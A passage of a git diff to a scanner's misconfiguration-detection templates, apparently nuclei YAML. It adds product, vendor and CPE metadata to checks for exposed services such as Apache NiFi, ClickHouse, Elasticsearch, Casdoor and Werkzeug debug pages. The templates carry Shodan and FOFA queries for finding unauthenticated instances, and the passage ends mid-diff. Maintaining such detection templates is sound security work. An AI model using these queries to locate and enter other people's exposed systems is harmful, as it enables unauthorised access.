misconfig,exposure,apache,drill + classification: + cpe: cpe:2.3:a:apache:drill:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030a4b7d4ffd3e534e720562827eace6ff4cd882b42ea16bfc4f29e2acf204f03022100cc67ba72b9d427ec1d39676424f61bbca5cff7ad1cae2c5e09535a4d04f519d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022030a4b7d4ffd3e534e720562827eace6ff4cd882b42ea16bfc4f29e2acf204f03022100cc67ba72b9d427ec1d39676424f61bbca5cff7ad1cae2c5e09535a4d04f519d0:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/apache-druid-unauth.yaml b/http/misconfiguration/apache-druid-unauth.yaml index d029ca9367..b4574d9942 100644 --- a/http/misconfiguration/apache-druid-unauth.yaml +++ b/http/misconfiguration/apache-druid-unauth.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Druid" + product: druid + vendor: apache tags: misconfig,druid,unauth,apache + classification: + cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032410ebe88dff06244ecd5348b0e4a3340bcc6cbab1c26d061e3231e039f3e610221009adb943521d59e4485ab6d9a04e2117e3db0c6dae660a5ff0aa31213e9b83d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032410ebe88dff06244ecd5348b0e4a3340bcc6cbab1c26d061e3231e039f3e610221009adb943521d59e4485ab6d9a04e2117e3db0c6dae660a5ff0aa31213e9b83d97:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/apache-impala.yaml b/http/misconfiguration/apache-impala.yaml index 1cd3977e36..2d7735ca8f 100644 --- a/http/misconfiguration/apache-impala.yaml +++ b/http/misconfiguration/apache-impala.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:587330928 + product: impala + vendor: apache tags: misconfig,apache,impala + classification: + cpe: cpe:2.3:a:apache:impala:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201dc3cd253eed22c678589452bebea6692552bfa91a81c9467c9a5a82f1f8ecdd022100e382474589312820dc0673ff200915a390c42824a0a4ee59a86114f1b7a800b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201dc3cd253eed22c678589452bebea6692552bfa91a81c9467c9a5a82f1f8ecdd022100e382474589312820dc0673ff200915a390c42824a0a4ee59a86114f1b7a800b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/apache-struts-showcase.yaml b/http/misconfiguration/apache-struts-showcase.yaml index 0a240c3195..aae3ce1b00 100644 --- a/http/misconfiguration/apache-struts-showcase.yaml +++ b/http/misconfiguration/apache-struts-showcase.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: title:"Struts2 Showcase" + product: struts + vendor: apache tags: apache,struts,showcase,misconfig,exposure + classification: + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd7f7b423bdd7d05868d8f1d47733eb40b471785b26564871538af7feb86839f022043022c33d92e6e55425a6b5e0066b736116a66816970b6d9c28d4f4731010799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd7f7b423bdd7d05868d8f1d47733eb40b471785b26564871538af7feb86839f022043022c33d92e6e55425a6b5e0066b736116a66816970b6d9c28d4f4731010799:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/apache/apache-nifi-unauth.yaml b/http/misconfiguration/apache/apache-nifi-unauth.yaml index 97c3191b56..de369e01e9 100644 --- a/http/misconfiguration/apache/apache-nifi-unauth.yaml +++ b/http/misconfiguration/apache/apache-nifi-unauth.yaml @@ -12,11 +12,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L cvss-score: 8.6 cwe-id: CWE-285 + cpe: cpe:2.3:a:apache:nifi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"NiFi" fofa-query: title="nifi" && body="Did you mean" + product: nifi + vendor: apache tags: misconfig,apache,nifi,unauth http: diff --git a/http/misconfiguration/apache/apache-zeppelin-unauth.yaml b/http/misconfiguration/apache/apache-zeppelin-unauth.yaml index 674552db96..8464f18ccb 100644 --- a/http/misconfiguration/apache/apache-zeppelin-unauth.yaml +++ b/http/misconfiguration/apache/apache-zeppelin-unauth.yaml @@ -12,11 +12,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L cvss-score: 8.6 cwe-id: CWE-285 + cpe: cpe:2.3:a:apache:zeppelin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Zeppelin" fofa-query: title="Zeppelin" + product: zeppelin + vendor: apache tags: misconfig,apache,zeppelin,unauth http: diff --git a/http/misconfiguration/apollo-adminservice-unauth.yaml b/http/misconfiguration/apollo-adminservice-unauth.yaml index bf7c1480e7..544dee4925 100644 --- a/http/misconfiguration/apollo-adminservice-unauth.yaml +++ b/http/misconfiguration/apollo-adminservice-unauth.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 + cpe: cpe:2.3:a:ctrip:apollo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"apollo-adminservice" + product: apollo + vendor: ctrip tags: misconfig,unauth,apollo,apolloadminservice http: diff --git a/http/misconfiguration/apple-cups-exposure.yaml b/http/misconfiguration/apple-cups-exposure.yaml index eb1a47ae08..fd93a69cb7 100644 --- a/http/misconfiguration/apple-cups-exposure.yaml +++ b/http/misconfiguration/apple-cups-exposure.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"Home - CUPS" + product: cups + vendor: apple tags: apple,cups,exposure,misconfig + classification: + cpe: cpe:2.3:a:apple:cups:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5acd38c88c7e860f27b1544c681398a343985c6f3c4adaa2d8fad232f5c9591022100e986b0836bdb5e42a5309d66374b8999766ff3ca6f568b2387e933f08ca34f9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5acd38c88c7e860f27b1544c681398a343985c6f3c4adaa2d8fad232f5c9591022100e986b0836bdb5e42a5309d66374b8999766ff3ca6f568b2387e933f08ca34f9d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/atlassian-bamboo-build.yaml b/http/misconfiguration/atlassian-bamboo-build.yaml index 6dd8512ad1..7719aa3af3 100644 --- a/http/misconfiguration/atlassian-bamboo-build.yaml +++ b/http/misconfiguration/atlassian-bamboo-build.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Build Dashboard - Atlassian Bamboo" + product: bamboo + vendor: atlassian tags: misconfig,atlassian,bamboo + classification: + cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/aws/aws-s3-explorer.yaml b/http/misconfiguration/aws/aws-s3-explorer.yaml index 4b41eb224e..10c821cce1 100644 --- a/http/misconfiguration/aws/aws-s3-explorer.yaml +++ b/http/misconfiguration/aws/aws-s3-explorer.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:amazon:aws_javascript_s3_explorer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 google-query: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer" + product: aws_javascript_s3_explorer + vendor: amazon tags: s3,edb,misconfig,aws,amazon http: diff --git a/http/misconfiguration/bitbucket-auth-bypass.yaml b/http/misconfiguration/bitbucket-auth-bypass.yaml index 8f98292c01..7da18fa121 100644 --- a/http/misconfiguration/bitbucket-auth-bypass.yaml +++ b/http/misconfiguration/bitbucket-auth-bypass.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: title:"Log in - Bitbucket" fofa-query: title="Log in - Bitbucket" + product: bitbucket_data_center + vendor: atlassian tags: misconfig,atlassian,bitbucket,auth-bypass + classification: + cpe: cpe:2.3:a:atlassian:bitbucket_data_center:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/bitbucket-public-repository.yaml b/http/misconfiguration/bitbucket-public-repository.yaml index 58d4de00a9..54bcbb1121 100644 --- a/http/misconfiguration/bitbucket-public-repository.yaml +++ b/http/misconfiguration/bitbucket-public-repository.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: http.component:"Bitbucket" + product: bitbucket + vendor: atlassian tags: misconfig,bitbucket + classification: + cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ef4ca6052fba249e81286a51927cb5134633b363ceb7519da7c8e92fc43b0b3d02207f22c712d50b529e3c282aa667c4092eaf94c91e94bb26430971d8e18b37a437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef4ca6052fba249e81286a51927cb5134633b363ceb7519da7c8e92fc43b0b3d02207f22c712d50b529e3c282aa667c4092eaf94c91e94bb26430971d8e18b37a437:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/bootstrap-admin-panel-template.yaml b/http/misconfiguration/bootstrap-admin-panel-template.yaml index 028d521664..4afbaaefe1 100644 --- a/http/misconfiguration/bootstrap-admin-panel-template.yaml +++ b/http/misconfiguration/bootstrap-admin-panel-template.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:teamworktec:responsive_bootstrap_admin_template:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Dashboard - Bootstrap Admin Template" + product: responsive_bootstrap_admin_template + vendor: teamworktec tags: bootstrap,panel,misconfig,exposure http: diff --git a/http/misconfiguration/browserless-debugger.yaml b/http/misconfiguration/browserless-debugger.yaml index 9be054bac6..f05fe793cc 100644 --- a/http/misconfiguration/browserless-debugger.yaml +++ b/http/misconfiguration/browserless-debugger.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"browserless debugger" + product: chrome + vendor: browserless tags: browserless,unauth,debug,misconfig + classification: + cpe: cpe:2.3:a:browserless:chrome:*:*:*:*:node.js:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/casdoor-users-password.yaml b/http/misconfiguration/casdoor-users-password.yaml index 1359e2b5f9..53204ae2a5 100644 --- a/http/misconfiguration/casdoor-users-password.yaml +++ b/http/misconfiguration/casdoor-users-password.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: title="Casdoor" + product: casdoor + vendor: casbin tags: casdoor,exposure,misconfig,disclosure + classification: + cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/chatgpt-web-unauth.yaml b/http/misconfiguration/chatgpt-web-unauth.yaml index 022ec62b2a..2c2e6eb6b5 100644 --- a/http/misconfiguration/chatgpt-web-unauth.yaml +++ b/http/misconfiguration/chatgpt-web-unauth.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 fofa-query: app="Chatgpt-web" + product: chatgpt_web + vendor: chanzhaoyu tags: chatgpt,unauth,misconfig + classification: + cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:* http: - raw: - | @@ -38,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml index 98f1a624df..d787252526 100644 --- a/http/misconfiguration/clickhouse-unauth-api.yaml +++ b/http/misconfiguration/clickhouse-unauth-api.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: "X-ClickHouse-Summary" fofa-query: "X-ClickHouse-Summary" + product: clickhouse + vendor: clickhouse tags: misconfig,clickhouse,unauth,disclosure + classification: + cpe: cpe:2.3:a:clickhouse:clickhouse:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/codeigniter-errorpage.yaml b/http/misconfiguration/codeigniter-errorpage.yaml index 3e4d270040..4694ed2050 100644 --- a/http/misconfiguration/codeigniter-errorpage.yaml +++ b/http/misconfiguration/codeigniter-errorpage.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: title:"Error" html:"CodeIgniter" fofa-query: title="ErrorException" + product: codeigniter + vendor: codeigniter tags: codeigniter,misconfig,error + classification: + cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +42,4 @@ http: - 200 - 500 condition: or -# digest: 4a0a00473045022100e319bcb75ac516a3b64842cee0c3a3a33f986ea077cfe62f49c0696041a6108202203874da1c083c996fb5fce8ab458fee421bf5b1d2c9dbe7646e06cd167c873c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e319bcb75ac516a3b64842cee0c3a3a33f986ea077cfe62f49c0696041a6108202203874da1c083c996fb5fce8ab458fee421bf5b1d2c9dbe7646e06cd167c873c99:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/codemeter-webadmin.yaml b/http/misconfiguration/codemeter-webadmin.yaml index be5f6f8d1d..ef4a65b9e2 100644 --- a/http/misconfiguration/codemeter-webadmin.yaml +++ b/http/misconfiguration/codemeter-webadmin.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"CodeMeter" + product: codemeter + vendor: wibu tags: misconfig,exposure,codemeter + classification: + cpe: cpe:2.3:a:wibu:codemeter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220207a4d8416d0eaaaae895ad3ebe6cb609571e0eca805a2752fa911c8b247d3f50220307c9c8a42f0463b53b32bdc4bceb92d7bec6e4285a0e2876d686440fa42009b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220207a4d8416d0eaaaae895ad3ebe6cb609571e0eca805a2752fa911c8b247d3f50220307c9c8a42f0463b53b32bdc4bceb92d7bec6e4285a0e2876d686440fa42009b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/confluence/confluence-oauth-admin.yaml b/http/misconfiguration/confluence/confluence-oauth-admin.yaml index af861ce214..8b922823aa 100644 --- a/http/misconfiguration/confluence/confluence-oauth-admin.yaml +++ b/http/misconfiguration/confluence/confluence-oauth-admin.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 2 shodan-query: http.component:"Atlassian Confluence" + product: confluence_server + vendor: atlassian tags: misconfig,jira,confluence,atlassian + classification: + cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/debug/ampache-debug.yaml b/http/misconfiguration/debug/ampache-debug.yaml index 733132b6f9..3ada6c1880 100644 --- a/http/misconfiguration/debug/ampache-debug.yaml +++ b/http/misconfiguration/debug/ampache-debug.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 2 shodan-query: http.title:"Ampache -- Debug Page" + product: ampache + vendor: ampache tags: misconfig,ampache,debug + classification: + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/debug/bottle-debug.yaml b/http/misconfiguration/debug/bottle-debug.yaml index cce159b64b..d9d7eec4ba 100644 --- a/http/misconfiguration/debug/bottle-debug.yaml +++ b/http/misconfiguration/debug/bottle-debug.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"Sorry, the requested URL" + product: bottle + vendor: bottlepy tags: bottle,exposure,debug,misconfig + classification: + cpe: cpe:2.3:a:bottlepy:bottle:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml index 8af96ff6be..b827866657 100644 --- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml +++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Werkzeug powered traceback interpreter" + product: werkzeug + vendor: palletsprojects tags: werkzeug,exposure,debug,misconfig + classification: + cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100c518e1fe0851c09171f99cd760d1a3d502d865e36aa5cc054e0d7d5a0ee24e860221008894b61367eee9ece8b8e3823f65efa8e47d1d41323d0acaa7c397ce45632a54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c518e1fe0851c09171f99cd760d1a3d502d865e36aa5cc054e0d7d5a0ee24e860221008894b61367eee9ece8b8e3823f65efa8e47d1d41323d0acaa7c397ce45632a54:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/debug/github-debug.yaml b/http/misconfiguration/debug/github-debug.yaml index ae53e9ca3f..796ff1caeb 100644 --- a/http/misconfiguration/debug/github-debug.yaml +++ b/http/misconfiguration/debug/github-debug.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"GitHub Debug" + product: github + vendor: github tags: misconfig,github,debug + classification: + cpe: cpe:2.3:a:github:github:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/dgraph-dashboard-exposure.yaml b/http/misconfiguration/dgraph-dashboard-exposure.yaml index 79707da613..3f23d12c1b 100644 --- a/http/misconfiguration/dgraph-dashboard-exposure.yaml +++ b/http/misconfiguration/dgraph-dashboard-exposure.yaml @@ -9,9 +9,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:dgraph:dgraph:*:*:*:*:go:*:*:* metadata: max-request: 1 shodan-query: http.title:"Dgraph Ratel Dashboard" + product: dgraph + vendor: dgraph tags: exposure,unauth,panel,misconfig http: diff --git a/http/misconfiguration/dlink-unauth-cgi-script.yaml b/http/misconfiguration/dlink-unauth-cgi-script.yaml index b0528b0f17..69e4249ed9 100644 --- a/http/misconfiguration/dlink-unauth-cgi-script.yaml +++ b/http/misconfiguration/dlink-unauth-cgi-script.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: "app=\"D_Link-DNS\"" + product: dns-345 + vendor: dlink tags: unauth,dlink,misconfig + classification: + cpe: cpe:2.3:h:dlink:dns-345:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100faef3e2642d3cd1b6e8e24c56eb728238309501a9db8898c308041635af4bbb6022100ed2440b3bd0c13869879595085a08be11ff936d4e974efba5ccd878ed7bf8de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100faef3e2642d3cd1b6e8e24c56eb728238309501a9db8898c308041635af4bbb6022100ed2440b3bd0c13869879595085a08be11ff936d4e974efba5ccd878ed7bf8de8:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/docmosis-tornado-server.yaml b/http/misconfiguration/docmosis-tornado-server.yaml index cc46dc9ae6..780249dc4a 100644 --- a/http/misconfiguration/docmosis-tornado-server.yaml +++ b/http/misconfiguration/docmosis-tornado-server.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Docmosis Tornado" + product: tornado + vendor: docmosis tags: misconfig,tornado,exposure + classification: + cpe: cpe:2.3:a:docmosis:tornado:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210085196cf99e1013fc3639e0a86644db2cd83ace3fb4d3adf2f7a956b42b38c354022100bc9c821d87d3ccf71f20973763c70a5f0daa357f6a53e17387818f30cc2f0304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085196cf99e1013fc3639e0a86644db2cd83ace3fb4d3adf2f7a956b42b38c354022100bc9c821d87d3ccf71f20973763c70a5f0daa357f6a53e17387818f30cc2f0304:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml b/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml index f136bce69e..e7d8a3d74c 100644 --- a/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml +++ b/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 4 shodan-query: http.component:"Drupal" + product: drupal + vendor: drupal tags: drupal,misconfig + classification: + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/elasticsearch.yaml b/http/misconfiguration/elasticsearch.yaml index 71a78e474e..fa2f2892ac 100644 --- a/http/misconfiguration/elasticsearch.yaml +++ b/http/misconfiguration/elasticsearch.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 4 shodan-query: "ElasticSearch" + product: elasticsearch + vendor: elasticsearch tags: elastic,unauth,elasticsearch,misconfig + classification: + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* http: - method: GET path: @@ -48,4 +52,4 @@ http: group: 1 regex: - '"number"\s:\s"([0-9.]+)"' -# digest: 490a0046304402207b44d14688d4487c464122b6e50ecfa3559829942a4dd3bcbe6a74ae7fa56e8d02204fea683b7c3a02f35cc6c012dc4792d3cfd602f30f84b57a8d1aaab32d4ad067:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b44d14688d4487c464122b6e50ecfa3559829942a4dd3bcbe6a74ae7fa56e8d02204fea683b7c3a02f35cc6c012dc4792d3cfd602f30f84b57a8d1aaab32d4ad067:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/envoy-admin-exposure.yaml b/http/misconfiguration/envoy-admin-exposure.yaml index fc0ec3be54..ea0be43e2d 100644 --- a/http/misconfiguration/envoy-admin-exposure.yaml +++ b/http/misconfiguration/envoy-admin-exposure.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: title:"Envoy Admin" + product: envoy + vendor: envoyproxy tags: misconfig,envoy,exposure + classification: + cpe: cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200730b4d4870c7f30e367b50699bcbd9fe09401983b47158e6e000f12f4f178fe022100ac3d37047f7413c77e9e050d233af8f0433c92f1f4b80cb590a3581ad5bb38ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200730b4d4870c7f30e367b50699bcbd9fe09401983b47158e6e000f12f4f178fe022100ac3d37047f7413c77e9e050d233af8f0433c92f1f4b80cb590a3581ad5bb38ac:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/esphome-dashboard.yaml b/http/misconfiguration/esphome-dashboard.yaml index 840f1513f0..2e125d431f 100644 --- a/http/misconfiguration/esphome-dashboard.yaml +++ b/http/misconfiguration/esphome-dashboard.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:"Dashboard - ESPHome" + product: esphome + vendor: esphome tags: misconfig,esphome,exposure,iot + classification: + cpe: cpe:2.3:a:esphome:esphome:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/everything-listing.yaml b/http/misconfiguration/everything-listing.yaml index 4ce90012ba..f1f1cfe49f 100644 --- a/http/misconfiguration/everything-listing.yaml +++ b/http/misconfiguration/everything-listing.yaml @@ -12,8 +12,12 @@ info: verified: 'true' max-request: 1 shodan-query: http.favicon.hash:-977323269 + product: everything + vendor: voidtools tags: exposure,everything,listing,voidtools,misconfig + classification: + cpe: cpe:2.3:a:voidtools:everything:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/feiyuxing-info-leak.yaml b/http/misconfiguration/feiyuxing-info-leak.yaml index f0e35570d6..defed9ac49 100644 --- a/http/misconfiguration/feiyuxing-info-leak.yaml +++ b/http/misconfiguration/feiyuxing-info-leak.yaml @@ -14,8 +14,12 @@ info: verified: "true" max-request: 1 fofa-query: title="飞鱼星企业级智能上网行为管理系统" + product: vec40g_firmware + vendor: feiyuxing tags: misconfig,exposure,iot,wpa,wpa2 + classification: + cpe: cpe:2.3:o:feiyuxing:vec40g_firmware:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/freshrss-unauth.yaml b/http/misconfiguration/freshrss-unauth.yaml index 6696dc5d10..0f9e8f51d6 100644 --- a/http/misconfiguration/freshrss-unauth.yaml +++ b/http/misconfiguration/freshrss-unauth.yaml @@ -10,8 +10,12 @@ info: max-request: 1 verified: true shodan-query: title:"Freshrss" + product: freshrss + vendor: freshrss tags: freshrss,misconfig,unauth,exposed + classification: + cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220711bbfdcea48f25f55e1465d58bfd13ab15e3e265a3435e2e0c4eb6f05333ca502201aea2a64cb3967574dcca15eb39690a94c8a775529bc1de47ca4820df7f6f2ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220711bbfdcea48f25f55e1465d58bfd13ab15e3e265a3435e2e0c4eb6f05333ca502201aea2a64cb3967574dcca15eb39690a94c8a775529bc1de47ca4820df7f6f2ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/fusionauth-admin-setup.yaml b/http/misconfiguration/fusionauth-admin-setup.yaml index 16b895fbd1..fa94fa0970 100644 --- a/http/misconfiguration/fusionauth-admin-setup.yaml +++ b/http/misconfiguration/fusionauth-admin-setup.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: title:"FusionAuth Setup Wizard" fofa-query: title="FusionAuth Setup Wizard" + product: fusionauth + vendor: fusionauth tags: misconfig,fusionauth,admin,setup + classification: + cpe: cpe:2.3:a:fusionauth:fusionauth:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022007d4dbb8a296fe926e5f296078aecfd6e737a4478b5ce8761f2de44c8620c953022018807ad838fddfa4096e7915fccf574e67b1c1b935d5c10d07082af0640b8632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007d4dbb8a296fe926e5f296078aecfd6e737a4478b5ce8761f2de44c8620c953022018807ad838fddfa4096e7915fccf574e67b1c1b935d5c10d07082af0640b8632:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/ganglia-cluster-dashboard.yaml b/http/misconfiguration/ganglia-cluster-dashboard.yaml index af291451d4..67104edb8d 100644 --- a/http/misconfiguration/ganglia-cluster-dashboard.yaml +++ b/http/misconfiguration/ganglia-cluster-dashboard.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: html:"ganglia_form.submit()" + product: ganglia-web + vendor: ganglia tags: misconfig,ganglia,dashboard + classification: + cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/git-web-interface.yaml b/http/misconfiguration/git-web-interface.yaml index df0d5a1efb..8b66874bf0 100644 --- a/http/misconfiguration/git-web-interface.yaml +++ 